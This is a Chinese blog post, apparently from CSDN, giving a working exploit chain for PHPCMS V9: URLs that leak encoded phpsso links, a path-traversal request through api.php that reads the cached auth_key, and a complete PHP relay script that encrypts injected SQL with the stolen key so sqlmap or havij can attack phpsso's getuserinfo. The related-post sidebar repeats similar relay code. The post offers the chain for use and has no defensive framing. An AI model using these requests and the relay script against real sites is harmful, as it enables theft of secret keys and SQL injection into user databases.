phpcms获取auth_key漏洞

最新推荐文章于 2024-05-14 06:54:55 发布
最新推荐文章于 2024-05-14 06:54:55 发布
阅读量2.7k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: phpcms

1. 

为所欲为漏洞:

注册登录后访问

http://localhost:8038/study/phpcms/index.php?m=member&c=index&a=account_manage_avatar&t=1



查看源文件:

 
 
拿到这个: 
 
 
 
aHR0cDovL2xvY2FsaG9zdDo4MDM4L3N0dWR5L3BocGNtcy9waHBzc29fc2VydmVyL2luZGV4LnBocD9tPXBocHNzbyZjPWluZGV4JmE9dXBsb2FkYXZhdGFyJmF1dGhfZGF0YT12PTEmYXBwaWQ9MSZkYXRhPWU1YzJWQU1HVVFaUkFRa0lVUVFLVndGVUFnSUNWZ0FJQWxkVkJRRkREUVZjVjBNVVFHa0FReFZaWmxNRUdBOSUyQkRqWm9LMUFIUm1Vd0JHY09YVzVVRGdRaEpEeGFlUVZuR0FkeFZSY0tRQQ== 
 
 
 
解除base64_decode编码得 
 
 
 
http://localhost:8038/study/phpcms/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9%2BDjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQA 
 
 
 
将url里的uploadavatar换成:getapplist得: 
 

http://localhost:8038/study/phpcms/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9%2BDjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQA


2.

http://www.test.org/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin


中转完直接sqlmap或者havij。sqlmap用中转非常不好用。不信你试试。

中转脚本:

<?php

set_time_limit(0);

$wang_url= 'http://www.0day5.com';

 

$auth_key= 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx';

 

$str= "uid=1".stripslashes($_GET['id']);

$encode= sys_auth($str, 'ENCODE', $auth_key);

$content= file_get_contents($wang_url."/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=".$encode);

echo$content;

functionsys_auth($string, $operation= 'ENCODE', $key= '', $expiry= 0) {

         $key_length= 4;

         $key= md5($key);

         $fixedkey= hash('md5', $key);

         $egiskeys= md5(substr($fixedkey, 16, 16));

         $runtokey= $key_length? ($operation== 'ENCODE'? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';

         $keys= hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));

         $string= $operation== 'ENCODE'? sprintf('%010d', $expiry? $expiry+ time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string: base64_decode(substr($string, $key_length));

         $i= 0; $result= '';

         $string_length= strlen($string);

         for($i= 0; $i< $string_length; $i++){

                   $result.= chr(ord($string{$i}) ^ ord($keys{$i% 32}));

         }

         if($operation== 'ENCODE') {

                   return$runtokey. str_replace('=', '', base64_encode($result));

         } else{

                   if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {

                            returnsubstr($result, 26);

                   } else{

                            return'';

                   }

         }

}

?>

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云直播 auth_key
J2778322217的博客
03-09 1290
privatestatic$_config = [ 'push_key' =>'XbRqF1xns4',//推流鉴权key 'live_key' =>'VjsnDLXexT',//播流鉴权key 'push_domain' =>'******',//推流域名 'live_domain' =>'******',//播流域名 'app_name' =>'***',//自定义应用名称 ...
phpcms authkey泄露漏洞
weixin_34405354的博客
04-03 352
网址加/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\\applist&path=admin ...
2024年最新PHPcms V9 任意文件上传漏洞_phpcmsv9漏洞(1),附物联网嵌入式开发面经
最新发布
2401_85012088的博客
05-14 1015
料,可以戳这里获取](https://bbs.csdn.net/topics/618679757)**
phpcms authkey 系列
温和的跳跃
12-03 357
不是很明白,对于加密解密一直不明白,还有漫长的业务逻辑。但是还是想明白一下下。
php获得auth_key漏洞,PHPCMS authkey泄露导致注入
weixin_34644072的博客
04-02 975
发布时间:2017-04-28公开时间:N/A漏洞类型:sql注入危害等级:高漏洞编号:xianzhi-2017-04-93356191测试版本:N/A漏洞详情install/install.php 184行if($module == 'admin') {$cookiepre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUV...
PHPCMS某处设计缺陷可致authkey泄露
aixuan9365的博客
05-25 408
在分析几个phpcms漏洞就换分析其他的,换换口味。 漏洞来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0106892.html swfupload上传页面输出了 MD5(auth_key+sess_id)。 函数位于 /phpcms/modules/attachment/functions/global.func.php...
phpcms_v9_beta_GBK.zip_PHPCMS_V9_beta
09-23
PHPCMS V9(简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的...
phpcms删除模型.rar_phpcms 删除模型_phpcms修改模型
09-20
在PHP CMS(如PHPCMS V9)中,用户可以根据需求自定义模型,以适应不同类型的网站内容。然而,有时候可能会遇到在后台尝试删除模型时遇到问题,导致无法正常进行删除操作。本文将详细讲解如何解决PHP CMS中删除模型...
PHPCMS商城模块_购物车+订单模块
11-27
PHPCMS是一款流行的开源内容管理系统,它以其强大的可扩展性和灵活性在IT行业中备受青睐。"PHPCMS商城模块_购物车+订单模块"是专为电商网站设计的一个功能组件,旨在提供一个完整的在线购物解决方案。这个模块包含了...
phpcms_file_manager_403.zip_phpcms
09-14
phpcms_file_manager_403.zip_phpcms:深入理解Web文件管理器与PHP编程实践》 在Web开发领域,文件管理器是不可或缺的一部分,它允许用户通过Web界面进行文件上传、下载、删除和编辑等操作。"phpcms_file_manager...
phpcms_v9_beta_GBK.zip_beta_phpcms
09-14
phpcms_v9 是该系统的第九个版本,通常每个新版本都会带来性能提升、功能增强以及用户体验的改进。GBK编码意味着这个系统支持中文字符集,特别适合构建中文网站,能够妥善处理中文信息的输入、存储和展示。 该...
phpcms authkey生成算法问题导致authkey泄露
草巾冒小子的博客
06-12 6435
关于phpcms authkey生成算法问题导致authkey泄露的修复问题 简介: 漏洞名称:phpcms authkey生成算法问题导致authkey泄露 补丁文件:caches/configs/system.php 补丁来源:云盾自研 漏洞描述:phpcms在安装时,由于在同一个页面中连续使用mt_rand(),未进行有效mt_srand();种子随机化操...
phpcms authkey注入中转脚本
weixin_33814685的博客
04-03 180
<?php set_time_limit(0); $wang_url='http://www.0day5.com'; $auth_key='xxxxxxxxxxxxxxxxxxxxxxxxxxxx'; $str="uid=1".stripslashes($_GET['id']); $encode=sys_auth($str,'ENCODE',...
PHPCMSV9 AuthKey泄露导致注入EXP
weixin_34329187的博客
04-03 542
天小站发布了PHPCMSV9 AuthKey泄露导致SQL注入的文章,熟悉本站的兄弟们都知道,今天可能就会发布EXP了,恭喜你,又猜对了。好久没有写PHP版的EXP了,这次再写就已经基本忘光了,唉,花了好久的时间呀,最终还是完成了。其实使用昨天的那个中转脚本已经完全够用了,今天发布的这个是给懒人用的,先给个图吧。。。<?php /** *Createdby独自等...
php获得auth_key漏洞,phpcms v9漏洞:authkey中转注入漏洞
weixin_39927993的博客
04-02 413
set_time_limit(0);$wang_url = 'http://www.adminwl.com';$auth_key = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx';$str = "uid=1".stripslashes($_GET['id']);$encode = sys_auth($str, 'ENCODE', $auth_key);$content = file...
PHPCMS \phpsso_server\phpcms\modules\phpsso\index.php、\api\get_menu.php Authkey Leakage
weixin_34095889的博客
07-06 400
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 安装phpcms的时候会强制安装它的通行证 Relevant Link: http://www.wooyun.org/bugs/wooyun-2014-066394 2. 漏洞触发条件 0x1: POC1 1...
解密 discuz 登陆产生的_auth信息cookie
lihuang319的专栏
07-11 1825
等我们登陆discuz的时候,势必会产生cookie信息。下面我们去解开discuz登陆的_auth信息 1、在我们自己的主网站上面先打印出来所有的cookie 2、我们发现会有好几个信息,然后我们找到*****_auth 以及******_saltkey 类似于这种的,因为前缀是根据不同的网站生成出来的。 3、然后我们去解密: 首先包含ucenter文件: Yii::import...
geoserver-2.22.2-authkey-plugin 接口authkey鉴权的使用
nongchao2011的专栏
06-02 923
geoserver-authkey如何使用
PHP+阿里云直播功能
lyan_6的博客
12-16 1368
前提条件 已注册阿里云账号,注册流程请参见注册阿里云账号。 账号已进行实名认证,实名认证流程请参见个人实名认证或企业实名认证。 准备2个已完成备案的域名,备案流程请参见备案。 若您要添加的推流域名和播流域名,是同一个一级域名下的两个二级域名,则只需要将一级域名进行备案即可。 步骤如下 1.添加推流域名和播流域名 2.配置CNAME解析 3. 关联推流和播流 在域名管理页面,选择您添加的播流域名,单击域名配置。 进入直播管理>基本配置页面,单击基础...
phpcms load_app_class 方法
06-01
`load_app_class` 是 PHPCMS 框架提供的一个用于加载应用程序类的方法。它的定义如下: ```php /** * 自动加载类 * @param string $classname 类名 * @param string $m 模块名称 * @param int $initialize 是否初始化(默认初始化) * @return mixed */ function load_app_class($classname, $m = '', $initialize = 1) { // ... } ``` 该方法有三个参数: - `$classname`:要加载的类名。 - `$m`:模块名称,如果不指定则默认为当前模块。 - `$initialize`:是否初始化,如果为 1 则会自动初始化该类,否则不会。 `load_app_class` 方法会根据 `$classname` 参数自动加载对应的类文件,并返回实例化后的对象。在 PHPCMS 框架中,所有的应用程序类都存放在 `phpcms/model` 目录下,文件名与类名相同。例如,要加载 `phpcms/model/content_model.class.php` 这个类,可以这样调用: ```php $content_model = load_app_class('content_model', 'content'); ``` 这里指定了模块名称为 `content`,因为 `content_model` 类属于 `content` 模块。如果不指定模块名称,则默认为当前模块。如果要禁止自动初始化该类,可以将 `$initialize` 参数设置为 0,例如: ```php $content_model = load_app_class('content_model', 'content', 0); ``` 这样就只会加载 `content_model` 类文件,但不会实例化该类。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值